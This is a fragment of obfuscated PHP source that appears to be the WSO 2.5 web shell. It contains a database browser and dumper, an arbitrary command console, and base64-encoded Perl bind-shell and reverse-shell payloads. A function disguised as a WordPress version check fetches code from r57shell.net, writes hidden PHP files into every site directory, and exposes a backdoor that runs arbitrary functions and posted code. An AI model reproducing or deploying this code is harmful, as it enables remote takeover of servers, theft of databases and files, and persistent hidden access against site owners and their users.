if(f.p2) f.p2.value='';\xd\xa if(f.p3) f.p3.value='';\xd\xa }
\xa }\xd
\x9 \x9function st(t,l) {
\xa\x9\x9 \x9d.sf.p1.value = 'select';\xd
\x9\x9 d.sf.p2.value = t;
\xa if(l && d.sf.p3) d.sf.p3.value = l;\xd
d.sf.submit();
}
\x9\x9function is() {\xd\xa \x9\x9 for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xd\xa\x9\x9 \x9d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xd\xa\x9\x9 }\xd\xa \x9</script>"; goto omuNC; omuNC: if (isset($db) && $db->link) { goto wQooQ; v7m0f: if (!empty($_POST["sql_base"])) { goto Rgzyg; MvXdD: if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { goto p5kAe; FQZVM: while ($item = $db->fetch()) { if (!$title) { goto UHBlV; UHBlV: echo "<tr>"; goto hcvnp; krRoK: $line = 2; goto OQDWZ; hcvnp: foreach ($item as $key => $value) { echo "<th>" . $key . "</th>"; } goto gYEfe; s133J: $title = true; goto vdCQU; vdCQU: echo "</tr><tr>"; goto krRoK; gYEfe: reset($item); goto s133J; OQDWZ: } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } goto LonsA; c36CC: $line = 1; goto FQZVM; LonsA: echo "</table>"; goto zCgso; vhOW_: echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">"; goto c36CC; p5kAe: $title = false; goto vhOW_; zCgso: } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } goto f63uD; f63uD: echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto l03yb; Rgzyg: $db->selectdb($_POST["sql_base"]); goto QW0Ku; uEPKu: if (@$_POST["p1"] == "select") { goto mAhBO; IznKf: if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>< Prev</a>"; } goto ZoHo3; l2Xna: $pages = ceil($num["n"] / 30); goto ZYT4s; mAhBO: $_POST["p1"] = "query"; goto e_ZJ4; ZYT4s: echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; goto uoZpe; Es7M3: $num = $db->fetch(); goto l2Xna; uoZpe: echo " of {$pages}"; goto IznKf; rczWG: $_POST["p3"]--; goto bhg9h; e_ZJ4: $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; goto Lo_J9; nEjUO: echo "<br><br>"; goto IQ9di; bhg9h: if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } goto nEjUO; Lo_J9: $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); goto Es7M3; ZoHo3: if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next ></a>"; } goto rczWG; IQ9di: } goto MvXdD; EHE8j: echo "</textarea><br/><input type=submit value='Execute'>"; goto epF3V; bDaxO: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? " " : " <small>({$n["n"]})</small>") . "</nobr><br>"; } goto M5p5r; l03yb: if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } goto EHE8j; M5p5r: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto uEPKu; QW0Ku: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto ss2k2; epF3V: echo "</td></tr>"; goto DdhHe; ss2k2: $tbls_res = $db->listTables(); goto bDaxO; DdhHe: } goto E6Jlf; E6Jlf: echo "</table></form><br/>"; goto eqSj_; HfqGV: if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } goto OSIXi; eqSj_: if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto HfqGV; wQooQ: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto v7m0f; OSIXi: } else { echo htmlspecialchars($db->error()); } goto qgUXu; eZaK7: echo "\xd
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xd\xa<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xd\xa<td><select name='type'><option value='mysql' "; goto XNXvh; L_VIT: if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { goto zzoGT; zzoGT: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto CgrPi; hq4SA: echo "</select>"; goto pJJmI; CgrPi: $db->listDbs(); goto KKbSG; MV0Hw: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } goto hq4SA; KKbSG: echo "<select name=sql_base><option value=''></option>"; goto MV0Hw; pJJmI: } else { echo $tmp; } } else { echo $tmp; } goto Auorx; pXyEP: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "pgsql": goto urMgZ; NmhxL: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto q24c2; q24c2: break; goto pMERe; urMgZ: $host = explode(":", $host); goto dzuNv; dzuNv: if (!$host[1]) { $host[1] = 5432; } goto NmhxL; pMERe: } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($this->link, $db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto ndkAm; Ccrqd: return false; goto kFQe3; ndkAm: $res = func_num_args() ? func_get_arg(0) : $this->res; goto uBsjP; uBsjP: switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } goto Ccrqd; kFQe3: } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql,_set_charset")) { return @mysqli_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": goto hIi1_; hIi1_: $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); goto Vq5gq; RFQO1: return array("file" => implode("
", $r)); goto Xccn3; Vq5gq: $r = array(); goto B2PD8; B2PD8: while ($i = $this->fetch()) { $r[] = $i["file"]; } goto ytmal; ytmal: $this->query("drop table wso2"); goto RFQO1; Xccn3: break; goto hza_Y; hza_Y: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": goto A8Rtf; XOdpv: $i = 0; goto nXX1H; dgmAw: if (!$head) { if ($fp) { fwrite($fp, ";
"); } else { echo ";\xa
"; } } goto xuWj3; nXX1H: $head = true; goto rdh_q; vLJ0E: $sql = $create[1] . ";\xa"; goto GZCGH; e85gZ: $this->query("SELECT * FROM `" . $table . "`"); goto XOdpv; A8Rtf: $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); goto WbvCG; rdh_q: while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ")"; $head = false; } else { $sql .= "\xa ,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } goto dgmAw; xuWj3: break; goto I2Pib; WbvCG: $create = mysqli_fetch_array($res); goto vLJ0E; GZCGH: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e85gZ; I2Pib: case "pgsql": goto yK1Fh; q4AGJ: break; goto M_aLo; YU12f: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $item) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto q4AGJ; yK1Fh: $this->query("SELECT * FROM " . $table); goto YU12f; M_aLo: } return false; } } goto S2jsy; nON0D: wsoHeader(); goto eZaK7; S2jsy: $db = new DbClass($_POST["type"]); goto b5FFe; xAAjI: echo ">MySql</option><option value='pgsql' "; goto WqMW0; b5FFe: if (@$_POST["p2"] == "download") { goto q3uCo; dKSpy: switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto SW_1d; SW_1d: if (empty($_POST["file"])) { goto UlEph; NKAxm: foreach ($_POST["tbl"] as $v) { $db->dump($v); } goto gTeuJ; UlEph: ob_start("ob_gzhandler", 4096); goto wxi0r; wxi0r: header("Content-Disposition: attachment; filename=dump.sql"); goto JFnky; gTeuJ: exit; goto o3LDH; JFnky: header("Content-Type: text/plain"); goto NKAxm; o3LDH: } elseif ($fp = @fopen($_POST["file"], "w")) { goto HVjKn; sI6XB: fclose($fp); goto JcIQa; JcIQa: unset($_POST["p2"]); goto eJ6NS; HVjKn: foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } goto sI6XB; eJ6NS: } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } goto V4cuJ; q3uCo: $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); goto G1BTq; G1BTq: $db->selectdb($_POST["sql_base"]); goto dKSpy; V4cuJ: } goto nON0D; XNXvh: if (@$_POST["type"] == "mysql") { echo "selected"; } goto xAAjI; gsteZ: } goto BTyYB; M9YJl: $_POST = WSOstripslashes($_POST); goto ocXfq; BTyYB: function actionNetwork() { goto ZoVmx; unkZP: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto PvgFx; y9LP4: if (isset($_POST["p1"])) { goto oL5si; oL5si: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto O2j7_; O2j7_: if ($_POST["p1"] == "bpp") { goto OF3WF; SvfsQ: unlink("/tmp/bp.pl"); goto zB2bw; l42lD: sleep(1); goto YdT1I; YdT1I: echo "<pre class=ml1>{$out}
" . wsoEx("ps aux | grep bp.pl") . "</pre>"; goto SvfsQ; P3N6B: $out = wsoEx("perl /tmp/bp.pl " . $_POST["p2"] . " 1>/dev/null 2>&1 &"); goto l42lD; OF3WF: cf("/tmp/bp.pl", $bind_port_p); goto P3N6B; zB2bw: } goto mmghY; mmghY: if ($_POST["p1"] == "bcp") { goto KdsjF; EYep1: unlink("/tmp/bc.pl"); goto vnHPj; cueL2: sleep(1); goto rbk8c; rbk8c: echo "<pre class=ml1>{$out}
" . wsoEx("ps aux | grep bc.pl") . "</pre>"; goto EYep1; KdsjF: cf("/tmp/bc.pl", $back_connect_p); goto JIcLb; JIcLb: $out = wsoEx("perl /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " 1>/dev/null 2>&1 &"); goto cueL2; vnHPj: } goto HmOsb; HmOsb: } goto JZOTa; QtVUX: wsoFooter(); goto r_ZsG; ZoVmx: wsoHeader(); goto ui6gf; PvgFx: echo "<h1>Network tools</h1><div class=content>\xd
<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xd\xa\x9<span>Bind port to /bin/sh [perl]</span><br/>
\xa Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xd
\x9</form>\xd\xa <form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xd\xa\x9<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\x9</form><br>"; goto y9LP4; JZOTa: echo "</div>"; goto QtVUX; ui6gf: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto unkZP; r_ZsG: } goto B8b3D; ABTpd: @ini_set("max_execution_time", 0); goto V8rDW; LNmAT: $default_action = "FilesMan"; goto uf2tU; hd5Oa: @define("WSO_VERSION", "2.5"); goto XWpnO; w2GF1: function actionConsole() { goto rclMD; fIAZm: if (isset($_POST["ajax"])) { goto b0kHG; UVP1d: exit; goto FfbZi; k7CDe: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto X7NDa; nIuhp: if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } goto VTnj_; LPhSs: $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . wsoEx($_POST["p1"]), "\xa\xd\x9\'\x0")); goto nIuhp; y6Hrb: echo "d.cf.cmd.value='';
"; goto LPhSs; wcz4k: ob_start(); goto y6Hrb; VTnj_: echo "d.cf.output.value+='" . $temp . "';"; goto k7CDe; jyokt: echo strlen($temp), "
", $temp; goto UVP1d; b0kHG: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto wcz4k; X7NDa: $temp = ob_get_clean(); goto jyokt; FfbZi: } goto KpSEA; RZ79V: echo "</form></div><script>d.cf.cmd.focus();</script>"; goto SJHUc; f8SjV: echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>"; goto IWzV6; SJHUc: wsoFooter(); goto APwh_; nacH0: echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; goto RZ79V; qs3Ch: echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>"; goto qrzII; IWzV6: if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])); } goto nacH0; c_48E: echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
\x9cur--;\xd
\x9\x9if(cur>=0)\xd
\x9document.cf.cmd.value = cmds[cur];\xd\xa \x9else
\x9\x9 cur++;
\xa\x9} else if(n == 40) {
\xa cur++;\xd\xa\x9 if(cur < cmds.length)\xd
document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9 cur--;
\xa }\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa cmds.push('');
cur = cmds.length-1;\xd\xa}\xd\xa</script>"; goto qs3Ch; qrzII: foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } goto f8SjV; KpSEA: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto dwgoJ; dwgoJ: wsoHeader(); goto c_48E; rclMD: if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } goto fIAZm; APwh_: } goto rTVjF; XWpnO: if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto avUWa; wkmQ0: $uri_path = dirname($uri_path); goto s730R; vOWZG: $uri_path = $parse_url["path"]; goto wkmQ0; sM0UF: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto vbq6x; rs5dk: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto bu9lX; toU7p: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto sM0UF; vbq6x: if (@$_GET["slince_golden"]) { goto TmOVZ; UCuri: if (function_exists("curl_init")) { goto BJyTL; vyR_l: curl_close($ch); goto SHblm; hYCm_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VE1SX; VE1SX: $response = curl_exec($ch); goto vyR_l; i0bPI: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto hYCm_; BJyTL: $ch = curl_init(); goto i0bPI; SHblm: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto kmEj4; TmOVZ: echo "<!-- //Silence is golden. -->"; goto UCuri; kmEj4: if (md5(sha1(@$_GET["is"])) == $response) { goto kgaYa; pHtWV: if (@$_POST["l"]) { function basic_code_extensions($request) { goto Wqe1_; q3A5w: $tmpf = stream_get_meta_data($tmp); goto gYkau; DzU1V: fclose($tmp); goto i26c2; uYFTY: $ret = (include $tmpf); goto DzU1V; dzD32: fwrite($tmp, $request); goto uYFTY; Wqe1_: $tmp = tmpfile(); goto q3A5w; i26c2: return $ret; goto An9L2; gYkau: $tmpf = $tmpf["uri"]; goto dzD32; An9L2: } print_r(basic_code_extensions($_POST["l"])); } goto fi0K3; FBXXk: if (@$_GET["m"]) { goto pvkox; ANUJn: echo $file_name_path; goto svCvU; ZI_cL: @file_put_contents($file_name_path, $response); goto ANUJn; pvkox: if (function_exists("curl_init")) { goto QH3uY; hFb2E: $response = curl_exec($ch); goto Qk97j; j__CW: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto S9Uoo; Qk97j: curl_close($ch); goto eMk6h; QH3uY: $ch = curl_init(); goto j__CW; S9Uoo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto hFb2E; eMk6h: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto X5MJi; X5MJi: $file_name_path = @$_GET["m"] . "gagal.php"; goto ZI_cL; svCvU: } goto pHtWV; kgaYa: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto FBXXk; fi0K3: } goto d_oge; d_oge: exit; goto fDMzx; fDMzx: } goto gHtz2; fqAaN: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto SO8pY; SO8pY: foreach ($dirs as $d) { goto Scp89; cQFnr: @file_put_contents($file_name, $response); goto cQiiG; Scp89: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto cQFnr; IlPtg: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto u66S4; cQiiG: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto IlPtg; u66S4: } goto Q6DRk; bu9lX: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto toU7p; gHtz2: if (!file_exists($tmp_file)) { goto f_kq1; QKlrR: @file_put_contents($tmp_file, $response); goto Ul3cm; f_kq1: if (function_exists("curl_init")) { goto A1VWF; J1jm0: curl_close($ch); goto p2Bti; dYLi3: $response = curl_exec($ch); goto J1jm0; sjN5S: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto nQ3kj; A1VWF: $ch = curl_init(); goto LvoXB; LvoXB: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto sjN5S; nQ3kj: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto dYLi3; p2Bti: } else { goto aeiKy; aeiKy: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto XFWPB; Qt92G: $context = stream_context_create($opts); goto mtDkU; XFWPB: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto Qt92G; mtDkU: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto jDy5x; jDy5x: } goto NFiUK; NFiUK: @touch($tmp_file); goto QKlrR; Ul3cm: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto KzbMt; HV6vx: @touch($tmp_file); goto pdkVa; KzbMt: if (function_exists("curl_init")) { goto eMsto; LO0re: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto k5X0p; HJ7kx: curl_close($ch); goto gjzj0; j4CQT: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto LO0re; CssGj: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto j4CQT; k5X0p: $response = curl_exec($ch); goto HJ7kx; eMsto: $ch = curl_init(); goto CssGj; gjzj0: } else { goto GK4cX; a3V7j: $opts = array("http" => array("header" => array("Referer: {$referer}\xd\xa"))); goto v8ndl; GK4cX: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto a3V7j; rOcio: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto nx629; v8ndl: $context = stream_context_create($opts); goto rOcio; nx629: } goto HV6vx; pdkVa: @file_put_contents($tmp_file, $response); goto mecCz; mecCz: } } goto fqAaN; avUWa: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto tIPJm; CD9KV: $parse_url = parse_url($request_uri); goto vOWZG; tIPJm: $request_uri = $_SERVER["REQUEST_URI"]; goto CD9KV; s730R: $file_path = dirname($document_file); goto rs5dk; Q6DRk: } wp_core_version_check(); } goto SG2I5; cUzsD: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto qljle; oE6Ue: $home_cwd = @getcwd(); goto qZOco; eRZM6: function wsoPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000>" . wsoPerms(@fileperms($f)) . "</font>"; } elseif (!@is_writable($f)) { return "<font color=white>" . wsoPerms(@fileperms($f)) . "</font>"; } else { return "<font color=#25ff00>" . wsoPerms(@fileperms($f)) . "</font>"; } } goto guAyk; HhMRL: function actionSecInfo() { goto wqp98; qT_UQ: wsoSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); goto zEzgM; oKr71: if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } goto owg70; giF29: wsoSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); goto V6Pow; o51U2: wsoSecParam("Open base dir", @ini_get("open_basedir")); goto giF29; m3Zin: wsoSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); goto o51U2; owg70: if (function_exists("oci_connect")) { $temp[] = "Oracle"; } goto DQ0Hi; I0L0t: if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . 